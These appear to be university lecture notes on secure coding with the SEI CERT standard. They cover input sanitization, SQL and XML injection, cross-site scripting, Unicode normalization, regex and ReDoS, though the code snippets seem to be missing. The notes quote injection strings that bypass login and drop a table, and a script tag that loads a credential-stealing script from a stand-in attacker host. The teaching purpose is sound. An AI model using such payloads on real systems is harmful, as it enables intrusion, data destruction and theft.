50.003 - Code Standards¶
Learning Outcomes¶
By the end of this unit, you should be able to
- Apply SEI CERT Java Coding Standard to improve security level of a software system
Coding Standard¶
Coding standard is a common guideline for a group of software engineers to follows so as to
- have a uniform structure of most of the codes
- improve readability
- improve referenceability
- improve maintainability
- minimize exploitability
Example, we find
- https://google.github.io/styleguide/
- https://wiki.sei.cmu.edu/confluence/display/java/SEI+CERT+Oracle+Coding+Standard+for+Java
SEI CERT Java Coding Standard¶
Let's take SEI CERT Java Coding Standard as an example. It consists of a set of rules which are meant to provide normative requirements for code. Each rule is associated with a metrics for severity (low, medium, and high), likelihood (unlikely, probably, and likely) and remediation cost (high, medium, and low). Conformance to the rule can be determined through automated analysis (either static or dynamic), formal methods, or manual inspection techniques.
For example, we find a subset of the rules as follows,
- Input valuation and data sanitization
- Object-orientation (not related for now since we focus on JavaScript). But you are strongly encouraged to read up.
- Locking and thread-safety (we've covered in some earlier unit in week 6.)
- Visibility and atomicity (not covered in this course)
Although these coding standards are set for Java and our main language for the module is JavaScript, we will discuss those are applicable to both languages.
Input Validation and Data Sanitization¶
Many programs accept untrusted data originating from unvalidated users, network connections, and other untrusted sources and then pass the (modified or unmodified) data across a trust boundary to a different trusted domain. Such data must be sanitized.
For example, we find the following rules in this category
- IDS00-J. Sanitize untrusted data passed across a trust boundary
- IDS01-J. Normalize strings before validating them
- IDS11-J. Eliminate non-character code points before validation
IDS00-J. Sanitize untrusted data passed across a trust boundary¶
The main idea is simple, given data provided by 3rd party, we should perform some sanitization to ensure the data is not malicious.
SQL Injection¶
An example of such data is SQL injection.
Suppose, we have the following code
Function login
takes a database connection object con
, the username un
and password pw
and try to search for the user record in the db_user
table.
Note that un
and pw
are input strings povided by external parties, normal users and malicious users.
A malicious user might set un
to ""
and pw
to "' OR '0'='0"
the query becomes
db_user
table. As a result, the user can login without giving a user name and password.
In the worst situation, a malicious user could give the following input un = ""
and pw = "'; drop table db_user; --"
, the query becomes
As a result, all the records in the db_user
are deleted.
To prevent SQL injection attacks, a Prepared Statement should be used.
In the updated version above, we use an overloaded query()
to define a prepared statement. to manage the query. The ?
placeholders allow the programmers to indicate where the untrusted input should be inserted after being sanitized. Via the prepared statement, we sanitize the untrusted input strings before inserting them into the statement.
XML Injection¶
Besides SQL injection, untrusted XML data fragment imposes threats to the system security too.
Consider the following JavaScript program
qty = "1"
, the resulting
XML document
which captures the user's shopping item, will be process by addToCart()
function.
Suppose a malicious user invokes the function with a rigged input qty = "1</quantity><price>1.0</price><quantity>1"
which results in the following XML document
addToCart()
method processes the elements top-to-bottom in order, it might override the price value 999.0
by 1
.
The fix to this issue is similar to the one for SQL injection. What is required is to santize the input string before embedding into the XML template which is used as a trusted data.
IDS01-J. Normalize strings before validating them¶
Cross Site Scripting¶
The third example of security loop holes caused by using untrusted data in the trusted context is Cross Site Scripting.
Consider the following app
Suppose the message created by some normal user and recored in the database is "hello"
. The above route handler returns
However the threat surfaces when the message retrieved from the database is
"<script src='http://hacker-network.io/stealuserinfo.js' type='javascript'></script> "
as the resulting html document becomes
when it is executed on the victim's browser, the hacker's script will be executed and extract the information from the victim's machine.
One way to address this issue is to santize the record retrieved from the database
However this might not cover all edge cases. Suppose the malicious user use the unicode representation of the <
and >
, namely and \uFE64
and \uFE65
.
This motivates the need of normalizing the unicode representations into the ascii representation before sanization.
Using Regex to sanitze input¶
Regular expression (Regex) is a commonly use domain specific language for string and data matching. It has a compact syntax and light-weightish implementation. Most of the languages come with libraries support of regex. For instance, in JavaScript, we use the following statement to define a regex object.
Then we can run it using
Here are some basic examples of constructing regex pattern.
Matching a single expression¶
In the above code snippet, r1
is a regex that matches a character a
. In the second line, we match the input string aaa
with the pattern. The result contains
the part that the regex matches, which is 'a'
, its index and the input and the groups if available. Note that it only searches for the pattern once in the input string.
Matching a single expression globally¶
If we want to apply the regex to look matches "globally" over the input, we define
Case insensitivity¶
If we would like to ignore case sensitivity during the match, we add i
to the flags field.
Anchored match¶
Sometimes we would like to regex to match with the exact starting and ending of the input.
In the above ^
denotes the starting of the input and $
denotes the ending.
Character class match¶
If we want to match a set of alterantive characters, we use
Note that if we use a ^
in a []
it means not, e.g. /[^ab]/
means match any character except for a
and b
.
Kleene's star¶
Klenee's star allows us to repeat a sub-regex pattern many times. (Note this is different from the global flag g
, which produces a list of matches).
Reference group¶
Sometimes, we would like to match and extract parts of the input. We use paranthesis to annotate the sub part that we would like to extract.
In the above, we match then extract the rest of a
after the first a
.
Note that we can add referenced kleene's star regex with a global flag. The following will produce an initialization error.
More on repetition¶
Besides kleene's star, we have the following different operators that define different constraint of repetition.
Pitfall of using Regex as input sanitzer¶
There many different algorithm in implementing regex matching. Unfortunately many existing libraries use a back-tracking approach when performing the regex matching. This leads to a possible security threat to the software system. e.g.
The above takes a substantial amount of time to converge, because the nested kleene's star of (a*)*
. The backtracking algorithm tries to back-track and searches for alternative to satisfy the match with the ending h
character though there are exponentially many paths to back-track.
In general, when a nested repeatable regex accept an empty input, it is problematic, it is classified as evil regular expression.
For more details, refer to